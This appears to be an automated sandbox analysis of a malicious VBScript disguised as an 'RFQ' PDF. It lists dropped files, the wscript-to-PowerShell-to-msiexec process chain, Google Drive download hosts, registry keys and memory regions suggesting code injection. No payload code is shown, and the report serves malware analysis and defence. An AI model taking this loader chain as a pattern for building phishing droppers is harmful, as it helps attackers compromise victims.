Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| RFQ_24196MR_PDF.vbs | ASCII text, with CRLF line terminators | initial sample | |
| C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_5bf5219ded9fba7eedec77d072a1c9e5c7a57c4_4aa59577_bced51df-f61f-4fea-9980-4eb0aca94c31\Report.wer | Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped | |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD38.tmp.dmp | Mini DuMP crash report, 14 streams, Fri Oct 25 17:44:13 2024, 0x1205a4 type | dropped | |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE81.tmp.WERInternalMetadata.xml | XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped | |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WERCEA1.tmp.xml | XML 1.0 document, ASCII text, with CRLF line terminators | dropped | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkgx4jan.30z.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o42kqqmh.lxh.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otjk2z2d.zfa.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spxg54pp.rr4.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Roaming\Solidifiable.Sch | ASCII text, with very long lines (65536), with no line terminators | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Windows\System32\wscript.exe | C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs" | |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | | |
| C:\Windows\SysWOW64\msiexec.exe | "C:\Windows\SysWOW64\msiexec.exe" | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292 | |

URLs

| Name | IP | Malicious |
|---|---|---|
| http://nuget.org/NuGet.exe | unknown | |
| http://drive.usercontent.google.com | unknown | |
| http://pesterbdd.com/images/Pester.png | unknown | |
| http://www.apache.org/licenses/LICENSE-2.0.html | unknown | |
| https://go.micro | unknown | |
| https://drive.usercontent.google.com( | unknown | |
| https://contoso.com/License | unknown | |
| https://contoso.com/Icon | unknown | |
| https://drive.usercontent.googh | unknown | |
| https://drive.usercontent.google.com/ | unknown | |
| http://drive.google.com | unknown | |
| https://drive.google.com/5f | unknown | |
| https://github.com/Pester/Pester | unknown | |
| https://www.google.com | unknown | |
| https://drive.google.com/=f | unknown | |
| https://drive.googPR | unknown | |
| http://crl.micro | unknown | |
| https://aka.ms/pscore6lBdq | unknown | |
| https://contoso.com/ | unknown | |
| https://nuget.org/nuget.exe | unknown | |
| https://drive.google.com | unknown | |
| https://drive.usercontent.google.com | unknown | |
| https://aka.ms/pscore68 | unknown | |
| https://apis.google.com | unknown | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown | |

Domains

| Name | IP | Malicious |
|---|---|---|
| drive.google.com | 142.250.185.238 | |
| drive.usercontent.google.com | 172.217.16.193 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 172.217.16.193 | drive.usercontent.google.com | United States | |
| 142.250.185.238 | drive.google.com | United States | |

Registry

| Path | Value | Malicious |
|---|---|---|
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | |

Memdumps
|
||
8318000
|
heap
|
page read and write
|
||
2109EE40000
|
heap
|
page read and write
|
||
7380000
|
trusted library allocation
|
page read and write
|
||
1DEF3EB0000
|
heap
|
page read and write
|
||
2109EEEA000
|
heap
|
page read and write
|
||
20740000
|
direct allocation
|
page read and write
|
||
1DEEBE18000
|
trusted library allocation
|
page read and write
|
||
76F778E000
|
stack
|
page read and write
|
||
724C000
|
heap
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
76F62E3000
|
stack
|
page read and write
|
||
802F000
|
trusted library allocation
|
page read and write
|
||
2D40000
|
heap
|
page readonly
|
||
210A097E000
|
heap
|
page read and write
|
||
7390000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B965000
|
trusted library allocation
|
page read and write
|
||
76F6978000
|
stack
|
page read and write
|
||
20700000
|
direct allocation
|
page read and write
|
||
21230000
|
heap
|
page read and write
|
||
7500000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
2109EF21000
|
heap
|
page read and write
|
||
76F6D3E000
|
stack
|
page read and write
|
||
700E000
|
stack
|
page read and write
|
||
27BE000
|
stack
|
page read and write
|
||
6DAB000
|
stack
|
page read and write
|
||
6FC34FE000
|
stack
|
page read and write
|
||
7F70000
|
heap
|
page read and write
|
||
8320000
|
heap
|
page read and write
|
||
7460000
|
trusted library allocation
|
page read and write
|
||
2109EF11000
|
heap
|
page read and write
|
||
8660000
|
direct allocation
|
page read and write
|
||
1DED9E10000
|
heap
|
page read and write
|
||
2109EEE4000
|
heap
|
page read and write
|
||
20B7D000
|
stack
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
850E000
|
stack
|
page read and write
|
||
1DED9F51000
|
heap
|
page read and write
|
||
2109EEBC000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
826E000
|
stack
|
page read and write
|
||
71F9000
|
heap
|
page read and write
|
||
1DEDBB21000
|
trusted library allocation
|
page read and write
|
||
7FFD9B967000
|
trusted library allocation
|
page read and write
|
||
2D10000
|
trusted library allocation
|
page read and write
|
||
4550000
|
heap
|
page execute and read and write
|
||
74C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
1DEDB910000
|
heap
|
page read and write
|
||
210A097B000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
210A0E4A000
|
heap
|
page read and write
|
||
73EE000
|
stack
|
page read and write
|
||
58E4000
|
heap
|
page read and write
|
||
7510000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
20E90000
|
direct allocation
|
page read and write
|
||
8CB0000
|
direct allocation
|
page execute and read and write
|
||
1DEDCA62000
|
trusted library allocation
|
page read and write
|
||
20690000
|
direct allocation
|
page read and write
|
||
210A098D000
|
heap
|
page read and write
|
||
210A0972000
|
heap
|
page read and write
|
||
6FC2D7A000
|
stack
|
page read and write
|
||
76F69BE000
|
stack
|
page read and write
|
||
20CBE000
|
stack
|
page read and write
|
||
8620000
|
direct allocation
|
page read and write
|
||
1DEF4020000
|
heap
|
page read and write
|
||
591B000
|
heap
|
page read and write
|
||
2109EF21000
|
heap
|
page read and write
|
||
206D0000
|
direct allocation
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
561E000
|
unkown
|
page read and write
|
||
6BED000
|
stack
|
page read and write
|
||
210A0AF0000
|
heap
|
page read and write
|
||
6F70000
|
direct allocation
|
page read and write
|
||
1DED9E60000
|
heap
|
page read and write
|
||
4785000
|
remote allocation
|
page execute and read and write
|
||
2109EEAE000
|
heap
|
page read and write
|
||
76F788B000
|
stack
|
page read and write
|
||
1DED9EC7000
|
heap
|
page read and write
|
||
8185000
|
trusted library allocation
|
page read and write
|
||
2109EEF2000
|
heap
|
page read and write
|
||
6C80000
|
direct allocation
|
page read and write
|
||
7201000
|
heap
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEDC05D000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
74B0000
|
trusted library allocation
|
page read and write
|
||
2AD1000
|
heap
|
page read and write
|
||
1DEDC1C6000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
20BFD000
|
stack
|
page read and write
|
||
1DEDBAF0000
|
heap
|
page execute and read and write
|
||
20DF0000
|
remote allocation
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
2CAE000
|
stack
|
page read and write
|
||
1DEDD5FF000
|
trusted library allocation
|
page read and write
|
||
210A097E000
|
heap
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEDDC2D000
|
trusted library allocation
|
page read and write
|
||
76F66FF000
|
stack
|
page read and write
|
||
1DEDCA4A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
584F000
|
stack
|
page read and write
|
||
55DE000
|
unkown
|
page read and write
|
||
210A0993000
|
heap
|
page read and write
|
||
210A09B2000
|
heap
|
page read and write
|
||
666E000
|
stack
|
page read and write
|
||
1DEF3F18000
|
heap
|
page read and write
|
||
1DEEBB21000
|
trusted library allocation
|
page read and write
|
||
1DEDB98A000
|
heap
|
page read and write
|
||
1DEF4100000
|
heap
|
page read and write
|
||
210A108D000
|
heap
|
page read and write
|
||
210A0978000
|
heap
|
page read and write
|
||
29E2000
|
unkown
|
page read and write
|
||
45E8000
|
heap
|
page read and write
|
||
6A15000
|
heap
|
page execute and read and write
|
||
742D000
|
stack
|
page read and write
|
||
2109EF7B000
|
heap
|
page read and write
|
||
2109EF06000
|
heap
|
page read and write
|
||
5675000
|
heap
|
page read and write
|
||
210A099B000
|
heap
|
page read and write
|
||
210A0975000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FF0000
|
trusted library allocation
|
page read and write
|
||
210A09A3000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
210A097E000
|
heap
|
page read and write
|
||
7F5D000
|
stack
|
page read and write
|
||
58DF000
|
heap
|
page read and write
|
||
6EB0000
|
heap
|
page read and write
|
||
1DEDA0B5000
|
heap
|
page read and write
|
||
58AE000
|
heap
|
page read and write
|
||
82D0000
|
heap
|
page read and write
|
||
7DF485AC0000
|
trusted library allocation
|
page execute and read and write
|
||
82F0000
|
heap
|
page read and write
|
||
1DEDC2A0000
|
trusted library allocation
|
page read and write
|
||
20C70000
|
trusted library allocation
|
page read and write
|
||
1DEDC56F000
|
trusted library allocation
|
page read and write
|
||
29EE000
|
unkown
|
page read and write
|
||
210A097E000
|
heap
|
page read and write
|
||
6A9E000
|
stack
|
page read and write
|
||
210A09A6000
|
heap
|
page read and write
|
||
20AA0000
|
heap
|
page read and write
|
||
210A0970000
|
heap
|
page read and write
|
||
1DEF4133000
|
heap
|
page read and write
|
||
210A0F69000
|
heap
|
page read and write
|
||
1DEDC03B000
|
trusted library allocation
|
page read and write
|
||
5921000
|
heap
|
page read and write
|
||
1DEDCA35000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEDB970000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
76F6DBC000
|
stack
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
8030000
|
trusted library allocation
|
page read and write
|
||
6C70000
|
direct allocation
|
page read and write
|
||
82C0000
|
trusted library allocation
|
page execute and read and write
|
||
1DEF4198000
|
heap
|
page read and write
|
||
58E4000
|
heap
|
page read and write
|
||
2109EEEF000
|
heap
|
page read and write
|
||
21030000
|
heap
|
page read and write
|
||
20F5E000
|
stack
|
page read and write
|
||
1DEDBAE7000
|
heap
|
page execute and read and write
|
||
29E8000
|
unkown
|
page read and write
|
||
8670000
|
direct allocation
|
page read and write
|
||
71E9000
|
heap
|
page read and write
|
||
1DED9EAB000
|
heap
|
page read and write
|
||
210A09A6000
|
heap
|
page read and write
|
||
5660000
|
heap
|
page read and write
|
||
7FCD0000
|
trusted library allocation
|
page execute and read and write
|
||
854D000
|
stack
|
page read and write
|
||
2109EF7A000
|
heap
|
page read and write
|
||
2D60000
|
heap
|
page read and write
|
||
20AFE000
|
stack
|
page read and write
|
||
20DF0000
|
remote allocation
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
6A5F000
|
stack
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEDCA70000
|
trusted library allocation
|
page read and write
|
||
5932000
|
heap
|
page read and write
|
||
27C9000
|
heap
|
page read and write
|
||
8690000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
2109EF31000
|
heap
|
page read and write
|
||
5670000
|
heap
|
page read and write
|
||
8570000
|
heap
|
page read and write
|
||
72E0000
|
heap
|
page execute and read and write
|
||
1DEDC107000
|
trusted library allocation
|
page read and write
|
||
2D12000
|
trusted library allocation
|
page read and write
|
||
1DEDDC14000
|
trusted library allocation
|
page read and write
|
||
2109EF18000
|
heap
|
page read and write
|
||
1DED9EAD000
|
heap
|
page read and write
|
||
4568000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
662C000
|
stack
|
page read and write
|
||
2109EF4D000
|
heap
|
page read and write
|
||
210A0976000
|
heap
|
page read and write
|
||
723F000
|
heap
|
page read and write
|
||
20E6F000
|
stack
|
page read and write
|
||
2D0A000
|
trusted library allocation
|
page execute and read and write
|
||
210A0977000
|
heap
|
page read and write
|
||
210A0972000
|
heap
|
page read and write
|
||
97D5000
|
direct allocation
|
page execute and read and write
|
||
8309000
|
heap
|
page read and write
|
||
1DEDBB10000
|
heap
|
page execute and read and write
|
||
1DEDA040000
|
heap
|
page read and write
|
||
1DEDC0E1000
|
trusted library allocation
|
page read and write
|
||
76F667E000
|
stack
|
page read and write
|
||
1DEF3E60000
|
heap
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
6C60000
|
direct allocation
|
page read and write
|
||
1DEF3FF0000
|
heap
|
page read and write
|
||
1DEDB8A0000
|
trusted library allocation
|
page read and write
|
||
206F0000
|
direct allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
210A0996000
|
heap
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
1DEEBE28000
|
trusted library allocation
|
page read and write
|
||
76F63EE000
|
stack
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
2109EEEB000
|
heap
|
page read and write
|
||
1DEDDC3A000
|
trusted library allocation
|
page read and write
|
||
2D6B000
|
heap
|
page read and write
|
||
5860000
|
heap
|
page read and write
|
||
1DED9EA6000
|
heap
|
page read and write
|
||
5947000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
20CFF000
|
stack
|
page read and write
|
||
8650000
|
direct allocation
|
page read and write
|
||
210A099F000
|
heap
|
page read and write
|
||
76F687E000
|
stack
|
page read and write
|
||
2109EF37000
|
heap
|
page read and write
|
||
2CE4000
|
trusted library allocation
|
page read and write
|
||
29DC000
|
unkown
|
page read and write
|
||
1DED9EF4000
|
heap
|
page read and write
|
||
210A0980000
|
heap
|
page read and write
|
||
20720000
|
direct allocation
|
page read and write
|
||
27C5000
|
heap
|
page read and write
|
||
7EF0000
|
trusted library allocation
|
page read and write
|
||
1DEDC4BE000
|
trusted library allocation
|
page read and write
|
||
2109F170000
|
heap
|
page read and write
|
||
1DEDDC18000
|
trusted library allocation
|
page read and write
|
||
4590000
|
heap
|
page read and write
|
||
2AAD000
|
heap
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
733E000
|
stack
|
page read and write
|
||
1DED9E00000
|
heap
|
page read and write
|
||
2109EEA8000
|
heap
|
page read and write
|
||
2109EF29000
|
heap
|
page read and write
|
||
A1D5000
|
direct allocation
|
page execute and read and write
|
||
2109EEF5000
|
heap
|
page read and write
|
||
2D00000
|
trusted library allocation
|
page read and write
|
||
210A0983000
|
heap
|
page read and write
|
||
1DED9E77000
|
heap
|
page read and write
|
||
7FE0000
|
trusted library allocation
|
page read and write
|
||
1DEF41D0000
|
heap
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
1DEF4024000
|
heap
|
page read and write
|
||
1DEDD168000
|
trusted library allocation
|
page read and write
|
||
1DEF3F56000
|
heap
|
page read and write
|
||
2109EF30000
|
heap
|
page read and write
|
||
2CB0000
|
trusted library section
|
page read and write
|
||
6B1E000
|
stack
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
1DEDC02E000
|
trusted library allocation
|
page read and write
|
||
1DEF41C2000
|
heap
|
page read and write
|
||
2D50000
|
trusted library allocation
|
page execute and read and write
|
||
6FC30FE000
|
stack
|
page read and write
|